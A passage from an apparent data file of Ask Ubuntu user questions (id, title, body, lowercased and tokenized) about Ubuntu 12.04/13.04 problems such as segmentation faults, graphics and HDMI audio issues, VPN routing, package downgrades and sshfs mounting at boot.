lspci 00:00.0 host bridge : intel corporation mobile 4 series chipset memory controller hub ( rev 07 ) 00:02.0 vga compatible controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:02.1 display controller : intel corporation mobile 4 series chipset integrated graphics controller ( rev 07 ) 00:1a.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 4 ( rev 03 ) 00:1a.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 5 ( rev 03 ) 00:1a.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 6 ( rev 03 ) 00:1a.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 2 ( rev 03 ) 00:1b.0 audio device : intel corporation 82801i ( ich9 family ) hd audio controller ( rev 03 ) 00:1c.0 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 1 ( rev 03 ) 00:1c.1 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 2 ( rev 03 ) 00:1c.2 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 3 ( rev 03 ) 00:1c.4 pci bridge : intel corporation 82801i ( ich9 family ) pci express port 5 ( rev 03 ) 00:1d.0 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801i ( ich9 family ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801i ( ich9 family ) usb2 ehci controller # 1 ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 93 ) 00:1f.0 isa bridge : intel corporation ich9m lpc interface controller ( rev 03 ) 00:1f.2 sata controller : intel corporation 82801ibm/iem ( ich9m/ich9m-e ) 4 port sata controller [ ahci mode ] ( rev 03 ) 00:1f.3 smbus : intel corporation 82801i ( ich9 family ) smbus controller ( rev 03 ) 09:00.0 ethernet controller : marvell technology group ltd. 88e8040 pci-e fast ethernet controller ( rev 13 )
326863	ubuntu 12.04 is throwing segmentation fault on every command in terminal , also often suddenly going to login screen	i am running openbox . what ever command i apply it keep saying `` segmentation fault '' and then often sometimes going back automatically to the ubuntu login screen even its mentioned to use openbox only . giving strange command outputs and not taking any commands . sun @ e700gent : ~ $ sudo init 6 sun @ e700gent : ~ $ sudo init 6 sun @ e700gent : ~ $ sudo init 6 sun @ e700gent : ~ $ sudo init 6 segmentation fault sun @ e700gent : ~ $ sudo init 6 sun @ e700gent : ~ $ sudo init 6 sun @ e700gent : ~ $ sudo init 6 segmentation fault sun @ e700gent : ~ $ sudo init 6 segmentation fault sun @ e700gent : ~ $ sudo init 6 segmentation fault sun @ e700gent : ~ $ sudo init 6 segmentation fault sun @ e700gent : ~ $ sudo init 6 segmentation fault sun @ e700gent : ~ $ how do i fix it ? edit : ram ? handle 0x000f , dmi type 17 , 34 bytes memory device array handle : 0x000d error information handle : not provided total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : channelb-dimm0 bank locator : bank 2 type : ddr3 type detail : synchronous speed : 1600 mhz manufacturer : hynix/hyundai serial number : 23392095 asset tag : 9876543210 part number : hmt351u6cfr8c-pb rank : 2 configured clock speed : 1600 mhz
326869	is number of compiled modules affecting size of kernel in ram ?	when i am compiling a kernel myself , the amount of drivers and modules i compile is definitely affecting the size of produced binary . does compiling the kernel also affect the size of kernel when it loads into memory ? i mean , when i compile also drivers i do n't need for my hardware , will kernel just ignore them , or are they also loaded in ram ? tl/dr : the question definitely is : when i compile kernel a containing only drivers that i need and kernel b containing drivers i need + extra drivers i do n't , will kernel b eat more memory than kernel a ?
326873	is it possible to clone a machine by `` restoring '' the backup of the existing machine to the new machine ?	i am wondering if the following is possible and exactly how i should go about it : i have machine 'a ' ( dual core i5 2.3 ghz ) with ubuntu 12.04lts installed and configured just the way i like it . i use a network drive to backup machine 'a ' ( using the ubuntu backup tool ) . i also have a machine 'b ' ( quad core i5 3.2 ghz ) . i am thinking of doing a fresh install of ubuntu 12.04lts on machine 'b ' , and then using the backup utility on machine 'b ' to restore the backups of machine 'a ' on to 'b ' , thereby cloning machine 'a ' on machine 'b ' . is such a thing doable ? is there a cleaner and/or safer way for me to clone 'a ' on 'b ' ? thanks in advance
326877	20in imac-isight - 12.04 black screen with mouse icon after boot	i recently installed 12.04 onto a imac g5 2.1 ghz ppc . the install went fine and i am able too successfully boot , however upon boot i only see a black screen with a mouse pointer . my issue is the same as : http : //ubuntuforums.org/showthread.php ? t=2123510 i have tried all of the suggested boot parameters but to no avail . when i attempt to enter terminal and logon , the mouse icon goes away and i think i am logged in , however the system will not respond to any commands to force the display mode . i believe my issue is https : //bugs.launchpad.net/ubuntu/+source/lightdm/+bug/1044180 , however i can not for the life of me figure out how to fix it given the fact i can not see anything and the terminal commands i am attempting to do without a monitor are not working . please help ! thanks , kyle
326879	sendmail very slow - /etc/hosts configuration	it takes ~15 seconds to send single e-mail using sendmail . /var/log/mail.log : jul 31 09:52:42 piotr-probook sendmail [ 2912 ] : my unqualified host name ( piotr-probook ) unknown ; sleeping for retry /etc/hostname : piotr-probook /etc/hosts : 127.0.0.1 piotr-probook localdev localhost 192.168.1.1 router /etc/mail/sendmail.cf : # hosts file ( normally /etc/hosts ) o hostsfile=/etc/hosts obviously i can ping piotr-probook host and http server popups in browser when i type url http : //piotr-probook what am i doing wrong ? how to fix the problem ?
326881	discrepancy in folder content size	i have a folder called 0 which contains subfolders and files . if i right click 0 and go to properties in nautilus , it shows that the folder contains 35 items totalling 22.2kb : however , if i go into 0 and select all of its contents it says that there are 32 items totally 9.9kb : in all cases , i have made sure nautilus is set to display hidden files and have checked that any subfolders does not contain any hidden files . why are there 3 missing items when inside the folder ? i would expect it to be missing 2 items to account for . and ... finally , why the drastic difference in the size ? what is the cause of this ? i am running ubuntu 13.04 64-bit .
326883	how to place window controls in chromium/chrome to the left side ?	anyone knows how to do it ? it does n't inherits openbox 's settings so i tried advices , related to other unity/gnome ( maybe chrom* inherits it ) : $ gconftool-2 -- get /apps/metacity/general/button_layout close , minimize , maximize : $ gsettings get org.gnome.desktop.wm.preferences button-layout 'close , minimize , maximize : ' $ gsettings get org.gnome.shell.overrides button-layout no such schema 'org.gnome.shell.overrides' but buttons still on the right side . and i still do n't want additional useless native decorator .
326884	xfce - gui for file compression ?	if i remember correctly , using nautilus in gnome , i could simply right-click on a file & select `` compress '' . now i am using thunar in xfce & i ca n't find how to simply compress files ... i absolutely do not want any command-line solution ! thanks for any suggestions & apologies if i missed something obvious !
326887	denied permissions to access and move folder from a mac hard disk	i have a imac in which the hard disk has failed . i am trying to get files off the users desktop that has not been backed up . i can not repair the hard disk and do not have another mac to transfer the data over that way . i am using the live version of ubuntu from the cd . the mac drive is there and i can access it , but i can not access the users desktop , music and pictures folders . it gives me `` no permissions '' message . when i right click on the folder , all the options are grayed out . i have an external hard disk attached to the mac and i want to move the content onto the external hard drive . i have tried using the chown command but i am struggling with it at the moment as i am not sure who to put in at the `` username '' part . i have tried using gksudo nautilus but i still do n't have permissions to change the owner of the folder .
326892	everpad not showing notes , behaving as if unlogged	i recently replaced my linux mint 14 installation with lubuntu 13.04 ( formatting my system partition along the way , but keeping my home partition ) , and everpad has since become unusable . i still am able to launch it without problems , and it does show up in the system tray , but the first time i click the icon after launching i see a scrolling menu with arrows on bottom on top in which my notes are scrolling and are not accessible because the arrows are too close ( i would take a screenshot , except the shortcut does not trigger when focused on everpad ) . if i click again , i can only access `` settings and management '' and `` exit '' ( which do not show up when i first click the icon ) . i 've been able to access my notes by invoking everpad -- all-notes , and since they were not up to date , i thought i 'd reauthorise everpad . but this has made things worse , since everpad 's note list is now empty . any suggestions ?
326893	how do i upgrade ubuntu ?	i 'm new to ubuntu and linux in general and coming from windows i was wondering how to upgrade ubuntu from one version to another . a new version is released each six months , right ? so let 's say i 'm now running 13.04 . when 13.10 will be released in october , how will i upgrade my system ? will i have to reinstall my whole linux , loosing all my programs or is there a way to simply replace 13.04 by 13.10 ?
326894	not able to access some websites	i am having trouble in loading some website but i can see connected status in my firefox browser .i am using google dns but i can open this site using vpn i adding my network details ... .. eth0 link encap : ethernet hwaddr 00:1b:38 : a7:6a:17 up broadcast running multicast mtu:1500 metric:1 rx packets:8423 errors:0 dropped:0 overruns:0 frame:0 tx packets:7974 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:5823300 ( 5.8 mb ) tx bytes:1127573 ( 1.1 mb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 up loopback running mtu:65536 metric:1 rx packets:721 errors:0 dropped:0 overruns:0 frame:0 tx packets:721 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:67367 ( 67.3 kb ) tx bytes:67367 ( 67.3 kb ) m link encap : ethernet hwaddr 00:1b:38 : a7:6a:17 up broadcast running multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:27 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:0 ( 0.0 b ) tx bytes:6347 ( 6.3 kb ) ppp0 link encap : point-to-point protocol inet addr:117.213.60.155 p-t-p:117.213.56.1 mask:255.255.255.255 up pointopoint running noarp multicast mtu:1492 metric:1 rx packets:8356 errors:0 dropped:0 overruns:0 frame:0 tx packets:7810 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:3 rx bytes:5588296 ( 5.5 mb ) tx bytes:899475 ( 899.4 kb ) i tried to ping www.thehindu.com but i receive no output amaljohn @ amaljohn-laptop : ~ $ ping www.thehindu.com ping www.thehindu.com ( 121.241.247.61 ) 56 ( 84 ) bytes of data . i receive no output . when i do port scan i receive following output : port state service 80/tcp open http 81/tcp open hosts2-ns 113/tcp closed ident tracerout : hop hostname ip time 1 1 117.213.60.155 117.213.60.155 0.188 1 117.213.56.1 117.213.56.1 46.290 1 117.213.56.1 117.213.56.1 46.285 2 218.248.166.10 218.248.166.10 209.502 3 115.114.130.49.static-chennai.vsnl.net.in 115.114.130.49 100.844 4 121.243.80.250.static-chennai.vsnl.net.in 121.243.80.250 101.942 5 121.241.247.61.static-chennai.vsnl.net.in 121.241.247.61 93.233 details of my iptables : amaljohn @ amaljohn-laptop : ~ $ sudo iptables -l chain input ( policy accept ) target prot opt source destination chain forward ( policy accept ) target prot opt source destination chain output ( policy accept ) target prot opt source destination
326895	creating a file system	i am attempting to learn about ubuntu by creating a 13.04 samba server . i have installed the basic server on one disk and created a lvg from 2 further disks . i have created a lv using all of the free space on the vg . i am unable to install a file system . sudo mkfs -t xfs /dev/group1/data returns an error of `` no such file or directory '' . mkfs does not appear in bin ( should it ? ) . i then tried sudo apt-get install mkfs and , after building the dependancy tree and reading the state information , i get `` unable to locate package mkfs '' .
326898	i ca n't see my usb ?	i have just installed ubuntu 12.04 , and i 'm new to this os . my problem is that when i plug in my usb i ca n't see it alongside the drivers . can anyone help ? i used command sudo fdisk -l and the result is : disk /dev/sda : 319.9 gb , 319936615424 bytes 255 heads , 63 sectors/track , 38896 cylinders , total 624876202 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xf0feae57 device boot start end blocks id system /dev/sda1 * 206848 124985343 62389248 7 hpfs/ntfs/exfat /dev/sda2 124985761 624864239 249939239+ f w95 ext 'd ( lba ) /dev/sda4 618212010 624876201 3332096 0 empty /dev/sda5 124985763 249971399 62492818+ 7 hpfs/ntfs/exfat /dev/sda6 374957163 499942799 62492818+ 7 hpfs/ntfs/exfat /dev/sda7 499942863 624864239 62460688+ 7 hpfs/ntfs/exfat /dev/sda8 249972736 318330879 34179072 83 linux /dev/sda9 318332928 374943743 28305408 82 linux swap / solaris partition table entries are not in disk order disk /dev/sdb : 4043 mb , 4043309056 bytes 125 heads , 62 sectors/track , 1018 cylinders , total 7897088 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x6f20736b this does n't look like a partition table probably you selected the wrong device . device boot start end blocks id system /dev/sdb1 ? 778135908 1919645538 570754815+ 72 unknown /dev/sdb2 ? 168689522 2104717761 968014120 65 novell netware 386 /dev/sdb3 ? 1869881465 3805909656 968014096 79 unknown /dev/sdb4 ? 2885681152 2885736650 27749+ d unknown partition table entries are not in disk order
326902	configuration of nvidia optimus extended screen using hdmi	i would like to extend my current laptop screen on a tv using a hdmi cable . even if i found several topics talking about that , none of them gave a clear solution , and they were where quite outdated . furthermore , i know that the use of hdmi for a second screen with optimus technology caused several troubles even in the bumblebee project . needless to say that , sadly , this extended screen works in plug and play due to the updated proprietary drivers on windows . but i really want to find out a solution on my ubuntu 13.04 , and i hope somebody can help me with this . my setup is as follow : > > lspci -vnn | grep '\ '' [ 030 [ 02 ] \ ] ' 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0126 ] ( rev 09 ) ( prog-if 00 [ vga controller ] ) 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gf108m [ geforce gt 540m ] [ 10de:0df4 ] ( rev a1 ) ( prog-if 00 [ vga controller ] ) what would you suggest me to start with and solve this issue ?
326906	graphics problem on imac g4 with ubuntu 12.4	hi i am new to installing ubuntu , but have run an installation with the 12.4 alternative iso on my old imac g4 with nvidia fx5200 graphics card . the installation completes and i can login and see the top menu bar with display settings etc . but the sidebar has no icons & when i open a window no window appears although it is there . my belief is that the screen resolution is set too high for the monitor ( 1660x1400 or similar ) i can randomly click on menu bars within the invisible windows and have tried to blindly open display settings but only have the option of the high screen resolution . has anyone had similar problems ?
326907	custom font with dmenu	i found references at various places running dmenu like so : dmenu_run -b -fn 'inconsolata 12' however , whatever variation of the font name i try , i always get dmenu : warning : can not load font < font name > fc-list | grep cons gives me : /usr/share/fonts/truetype/inconsolata/inconsolata.otf : inconsolata : style=medium it does not show in xlsfonts and all the fonts that do show up with xlsfonts work fine . what is the correct way to reference these fonts from command line ? also , is that a standard way to reference fonts or will it change when using programs like pango ?
326910	how can i find out if a particular package has been updated ( or not ) ?	i generally update everything that ubuntu tells me needs updating so i do n't keep a track of things that have not been updated . recently i have been noticing differences in the behaviour of the cpio command . it is basically reporting errors when it did not do so a few months ago , despite none of the target files changing - that goes for their permissions also . this leads me to suspect that perhaps my cpio binary has been updated . my question is , is there a way that i can find this out and if so revert back to the old version . does ubuntu keep a log of this information anywhere ? i am using version 12.04 .
326911	ubuntu touch apps do n't recognize ubuntu multitouch , utouch	i was under the assumption that the ubuntu touch apps as found here would run using the ubuntu touch stack , supporting gestures and touch events . however through my attempts i have only been able to get these apps to run using the mouse and there does n't seem to be any gesture support . my touch table hardware is producing touch events conforming to the multitouch protocol and has been tested and works fine with kivy 's touchtracer app , used to test various inputs . i am not sure why the ubuntu touch mobile apps would n't work with utouch , i have n't be able to find any information regarding this and what touch stack ubuntu touch is using . put short , why do n't ubuntu touch apps support the multitouch protocol ? and how can i develop apps that make use of the multitouch protocol ? ( the abs_mt_position_x and abs_my_position_y input events going through evdev ) .
326914	how can i work out how long i 've been an ubuntu member for ?	like a lot of the users here , i 've gone through the steps to become an ubuntu member . i wo n't reiterate the details of what that means but recently it was announced that certificates would be available for members and i 'd like to cash that chip in now . the problem is the form asks when i became a member ... and i 'm not sure . i suspect it somewhere in october 2011 because that 's the last time i edited my wiki page . is there a public registration of ubuntu members that includes their registration dates ?
326916	ubuntu application switcher like elementaryos	i love the way elementaryos aplication switcher looks like ( alt+tab ) and i want the same efect on my ubuntu 13.04 . is there any way to accomplish this ? thnks
326923	nvidia hdmi audio - device not shown	nvidia hdmi audio is a widely asked topic , but i 've not been able to find the answer for my case . card displayed by lspci $ lspci ... 01:00.0 vga compatible controller : nvidia corporation gf114 [ geforce gtx 560 ti ] ( rev a1 ) 01:00.1 audio device : nvidia corporation gf114 hdmi audio controller ( rev a1 ) device displayed by aplay $ aplay -l ... card 2 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 7 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 8 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 2 : nvidia [ hda nvidia ] , device 9 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 all outputs unmuted by alsamixer but the card does not appear in the sound controller from system settings . i 'm currently using `` nvidia-325 '' driver , but i tried `` nouveau '' and several other versions my hdmi output is detected to be /proc/asound/card2/eld # 1.0 $ cat /proc/asound/card2/eld # 1.0 monitor_present 1 eld_valid 1 monitor_name denon-avamp connection_type hdmi ... speaker-test does not find the device $ speaker-test -c 2 -r 48000 -d hw:2,3 speaker-test 1.0.25 playback device is hw:2,7 stream parameters are 48000hz , s16_le , 2 channels using 16 octaves of pink noise playback open error : -19 , no such device can someone help me with my problem ? or at least tell me why does n't my device appear on sound settings ?
326932	is it possible to run a command before log in screen ?	how can i run : xbacklight -set 0 before login screen ?
326933	netbeans broken after openjdk update	i had some strange issues on my notebook where netbeans hangs some times and also some dialog items are missing . i tried various things ( ugrading to jre-7 , switching to oracle jre , other versions of netbeans - anything from 7.0 to 7.3 ) but nothing helped . today i updated my main pc ( both are under 12.04 64bit ) and it suddenly shows the same problems . so the problem must be connected to the update . i had a look at the dpkg.log and saw , that i got a new openjdk version . cat /var/log/dpkg.log 2013-07-31 12:38:19 configure openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.2 < none > 2013-07-31 12:38:19 status unpacked openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.2 2013-07-31 12:38:19 status half-configured openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.2 2013-07-31 12:38:19 status installed openjdk-6-jre 6b27-1.12.6-1ubuntu0.12.04.2 2013-07-31 12:38:19 configure openjdk-6-jdk 6b27-1.12.6-1ubuntu0.12.04.2 < none > 2013-07-31 12:38:19 status unpacked openjdk-6-jdk 6b27-1.12.6-1ubuntu0.12.04.2 2013-07-31 12:38:19 status half-configured openjdk-6-jdk 6b27-1.12.6-1ubuntu0.12.04.2 2013-07-31 12:38:20 status installed openjdk-6-jdk 6b27-1.12.6-1ubuntu0.12.04.2 so i reverted the update using : apt-cache showpkg openjdk-6-jre apt-get install openjdk-6-jre=6b24-1.11.1-4ubuntu2 but the problem still persists . has anybody ever had a similiar problem or an idea to resolve this ? best regards , malte * edit * i just saw that java -version still shows openjdk runtime environment ( icedtea6 1.12.6 ) ( 6b27-1.12.6-1ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 20.0-b12 , mixed mode ) so it seems the downgrade did n't work out . do i need to downgrade any other packages ? i 'm unable to install a 6b24 package of icedtea6-jre-cacao via apt-get install .
326935	how to enable bluetooth without restarting os ?	i have a problem with bluetooth in ubuntu 13.04 . the bluetooth wo n't work until i restart my laptop . i 've tried : hciconfig hci0 reset hciconfig hci0 up service bluetooth start any help is appreciated .
326937	after new router wlan does n't connect anymore	i switched routers from a fritzbox 7390 to a dlink 615 . since i switched i cant connect over wlan in 13.04 to the dlink . it works fine in windows8 and my android devices . thanks for yor help : ) jul 31 13:00:59 netbook networkmanager [ 1041 ] : < warn > ( eth1 ) : dhcpv4 request timed out . jul 31 13:00:59 netbook networkmanager [ 1041 ] : < info > ( eth1 ) : canceled dhcp transaction , dhcp client pid 2858 jul 31 13:00:59 netbook networkmanager [ 1041 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... jul 31 13:00:59 netbook networkmanager [ 1041 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) started ... jul 31 13:00:59 netbook networkmanager [ 1041 ] : < info > ( eth1 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] jul 31 13:00:59 netbook networkmanager [ 1041 ] : < warn > activation ( eth1 ) failed for connection 'go.israel1' jul 31 13:01:00 netbook networkmanager [ 1041 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) complete . jul 31 13:01:00 netbook networkmanager [ 1041 ] : < info > ( eth1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] jul 31 13:01:00 netbook networkmanager [ 1041 ] : < info > ( eth1 ) : deactivating device ( reason 'none ' ) [ 0 ] jul 31 13:01:00 netbook avahi-daemon [ 1001 ] : withdrawing address record for fe80 : :762f:68ff : fea8:48c0 on eth1 . jul 31 13:01:00 netbook avahi-daemon [ 1001 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :762f:68ff : fea8:48c0 . jul 31 13:01:00 netbook avahi-daemon [ 1001 ] : interface eth1.ipv6 no longer relevant for mdns . jul 31 13:01:00 netbook kernel : [ 165.295392 ] cfg80211 : calling crda to update world regulatory domain jul 31 13:01:00 netbook kernel : [ 165.303768 ] cfg80211 : world regulatory domain updated : jul 31 13:01:00 netbook kernel : [ 165.303778 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) jul 31 13:01:00 netbook kernel : [ 165.303783 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 31 13:01:00 netbook kernel : [ 165.303787 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 31 13:01:00 netbook kernel : [ 165.303790 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) jul 31 13:01:00 netbook kernel : [ 165.303793 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 31 13:01:00 netbook kernel : [ 165.303797 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) jul 31 13:01:00 netbook wpa_supplicant [ 1230 ] : eth1 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 jul 31 13:01:00 netbook networkmanager [ 1041 ] : < info > ( eth1 ) : supplicant interface state : completed - > disconnected < / $ >
326940	can not install vmware-view-client on 13.04 amd64	new install 13.04 amd64 optiplex-7010 : ~ $ sudo apt-get install vmware-view-client [ sudo ] password for xxxxxxxx : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vmware-view-client : i386 : depends : libudev0 : i386 ( > = 147 ) but it is not installable e : unable to correct problems , you have held broken packages . tried -- optiplex-7010 : ~ $ sudo apt-get install libudev0 : i386 [ sudo ] password for xxxxxxxx : reading package lists ... done building dependency tree reading state information ... done package libudev0 : i386 is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'libudev0 : i386 ' has no installation candidate ran sudo apt-get upgrade , tried again , same failure
326942	can not connect remotely to ubuntu using hostname on win7	i am trying to connect to my ubuntu pc from my windows 7 pc using ultravnc ( on lan ) . it works when i use the ip address of the ubuntu pc , but when i use its hostname it does n't work at all , i cant even ping its hostname using windows pc , but i can ping its ip address . i have enabled remote desktop on ubuntu to allow remote control and that works because i can do it using ip address . i have also tried disabling firewall using `` sudo ufw disable '' and it still does n't work . i have also tried using automatic dns with dhcp , and i have tried setting it manually as well and it still does n't work . also to note that i have a wired connection ( lan ) and vpn connection ( internet ) , but that does n't matter i gues because this is only important for lan . i have installed samba as well . please help me by giving me a detailed explanation on what should i do , because i am a total beginner in linux and i am still experimenting with everything but i cant figure out what to do here . i have tried using mint linux and connection using its hostname works , but i would still preffer to use ubuntu . thanks in advance .
326951	setting vpn just for some special software , not for all parts of system ?	how to use vpn just for some part of the system ? this means that , for example , firefox and aria2c will use the vpn and pidgin wo n't ! is it possible ? in my case , i want to use vpn for whole system except : transmission , apt-get and pidgin or vice versa : just using vpn for these software : firefox , aria2c , youtube-dl
326953	reinstall ubuntu over version installed by my son using windows installer	my youngster installed ubuntu using a windows installer . i tried uninstalling using the uninstall included in the ubuntu directory in windows . that does n't work . is it safe for me to instal ubuntu from a cd over the version already there . is there going to be a problem with the dual boot or will the new installation overwrite the windows boot loader which the previous installation set up ?
326954	iso appearently empty when mount	hi im having trobles with a game iso . when i mount it , appears to be empty . used furius-iso , archive mounter and archive manager to see its content . any of the programs open it as empty iso . i use xubuntu 13.04
326955	converting scanned documents into `` word '' documents ?	i have just done a search on google as to how i would convert a scanned document ( of a typescript ) into a document that would recognize the characters just like any other word document . but ofcourse i went and forgot that i am using ubuntu and not windows . so is it still possible somehow to do the same on ubuntu is what i am wondering . i would really appreciate any help . thank you .
326959	how can i make the function keys the default on a logitech k760 bluetooh keyboard ?	i had hoped that solaar would help , but it seems to only work for the logitech wireless devices that use logitech 's proprietary scheme . i have bluetooth keyboard ( k760 ) . i know it can be told to use the function keys ( rather than the media keys ) by default because i can do it on under os x with software from logitech . just remapping the keys wo n't work as f1 , f2 , and f3 are special in that they switch which bluetooth device i connect to and the keys are not sent to the os .
326962	temporarily reboot into windows while suspending ubuntu	is it possible reboot into windows while suspending ( or hibernating ) ubuntu , as opposed to choosing shut down , followed by restart , if i have dual boot ? more precisely , i would like to be able to simply click a menu item next to where you have log out ... , suspend and shut down ... , or use a shortcut , to reboot the machine while the current state of my running ubuntu session is suspended and can be quickly brought back whenever i shut down windows . ideally the boot loader should be customized so that when i choose to reboot into windows , i am automatically booting windows ( for that single boot ) . perhaps grub supports this kind of temporary boot options . i do n't know . the reason i want to be able to quickly jump into windows ( and soon back to ubuntu again ) is because i have windows programs that i frequently use which can only run under windows , and running them under wine or similar is not feasible ( e.g. , adobe lightroom ) . annoyingly i am forced to still rely on windows . also , i am not the sole user of the computer , so jumping between os is important to do swiftly . the question is not about finding solutions to whether i can use a vm or similar to emulate my needs of windows .
326967	permission for mongodb user problem	i am going to install mongodb on amazon ec2 ubuntu 12.0.4 linux server and change the default location of the mongodb . i searched the internet and saw a lot of article that tell the user to use ( http : //d36cz9buwru1tt.cloudfront.net/aws_nosql_mongodb.pdf , page7 ) sudo chown mongod : mongod /yourmongodb to get permission to your new mongodb location . i just wonder , there is know mongodb user and mongodb group how could i do that ? ! ! most of the article wrote that and it couldnt work ! ! is there any way to do that ? ! tips ? !
326969	missing file for driver patch ( atheros ar9485 )	first , it should be known that i have never applied a patch before . it 's high time i learned , and lord knows no one else is going to do it for me . any info that could help me advance the ball would be most appreciated . like many linux users , i have experienced very weak signals with my atheros ar9845 adapter . after trying many of the fixes i found ( to no avail ) , a helpful participant in the irc # ubuntu room pointed me to this patch . i 'd like to apply said patch , but i ca n't find the appropriate files . i see the folder where they should be ( /lib/modules/3.9.0-030900-generic/kernel/drivers/net/wireless/ath/ath9k ) , but the files mentioned in the patch do not exist . after looking through the bug discussion , it appears that the patch should be applied on top of 3.10-rc6 ( i think ) . does this mean i have to upgrade from raring ringtail 3.9 to saucy salamander 3.9 and then update to 3.10-rc6 ? do i need to backport wireless drivers into my current kernel version ? if so , a point in the right direction for an example of doing this with later kernel versions would be most appreciated . i have seen a number of examples for pre-3.7 kernels , but it looks like the method of sharing these backports has changed . to be honest , i am a bit at a loss for how to proceed with the new site at this point . i am currently using an asus q550lf , and i am happy to edit with more info if needed .
326976	how to import winamp equalizer presets to audacious ?	i just switched from xmms to audacious and i 'm trying to import the winamp presets but without success so far . i checked various guides but none of them works . i have a file named eq.preset but if i try to import it to audacious i get an error : error importing winamp eqf file 'file : ///home/edem/winamp_presets' i think that either this is a bug some people mentioned about audacious or i 'm using the wrong file . it looks like this : [ presets ] preset0= ( winamp ) classical preset1= ( winamp ) club preset2= ( winamp ) dance preset3= ( winamp ) full bass preset4= ( winamp ) full bass & treble preset5= ( winamp ) full treble preset6= ( winamp ) laptop speakers / headphones preset7= ( winamp ) large hall preset8= ( winamp ) live preset9= ( winamp ) party preset10= ( winamp ) pop preset11= ( winamp ) reggae preset12= ( winamp ) rock preset13= ( winamp ) ska preset14= ( winamp ) soft preset15= ( winamp ) soft rock preset16= ( winamp ) techno [ ( winamp ) classical ] preamp=-1.11022e-15 band0=-1.11022e-15 band1=-1.11022e-15 band2=-1.11022e-15 band3=-1.11022e-15 band4=-1.11022e-15 band5=-1.11022e-15 band6=-7.2 band7=-7.2 band8=-7.2 band9=-9.6 ... since i 'm using a rather new version ( 3.3.4 ) i think i 'm using a wrong preset file . can you help me out on this one ?
326977	sshfs is not mounting automatically at boot , despite /etc/fstab configuration	setting up some ubuntu ( 13.04 ) workstation , i am trying to have a remote filesystem mounted ( over ssh ) . the current config i created user someuser and added it to the fuse group my fstab entry reads like : sshfs # someuser @ remote.com : /remote_dir /media/remote_dir/ fuse auto , _netdev , port=22 , user , allow_other , noatime , follow_symlinks , identityfile=/home/someuser/.ssh/id_rsa , reconnect 0 0 from my understanding : auto : is explicitly asking for the remote fs to be mounted at boot _netdev : wait for interface to be up before attempting to mount user : allow any user to ask for this specific remote location to be mounted ( useless in the perspective of the root user automatically mounting it at boot ) allow_other : will allow any user ( in the fuse group ? ) to access the mounted fs identityfile : points to the private key paired with the public key added in the /home/someuser/.ssh/authorized_key of the remote machine . reconnect : not sure ... will attempt to reconnect if the connection is lost ? the problem at boot , i log with someuser , fire up a terminal , and /media/remote_dir is empty . but from the same user ( or the root ) , i can mount it just typing : mount sshfs # someuser @ remote.com : /remote_dir it is also auto-magically 